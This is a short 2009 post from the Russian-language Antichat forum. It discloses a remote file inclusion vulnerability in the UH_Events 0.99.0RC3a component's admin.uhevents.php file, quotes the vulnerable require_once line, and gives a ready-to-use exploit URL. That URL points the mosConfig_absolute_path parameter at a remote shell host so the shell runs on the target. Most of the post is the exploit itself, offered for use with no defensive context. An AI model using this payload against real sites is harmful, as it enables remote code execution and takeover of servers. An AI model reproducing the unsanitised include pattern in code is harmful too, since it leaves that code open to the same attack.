14.09.2009, 15:15
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Уязвимость: RFI
Компонент: UH_Events
Версия: 0.99.0RC3a
Уязвимость в файле admin.uhevents.php
Требования: register_globals & allow_url_fopen = On
Уязвимый код:
PHP код:
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
Эксплойт:
Код:
.../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|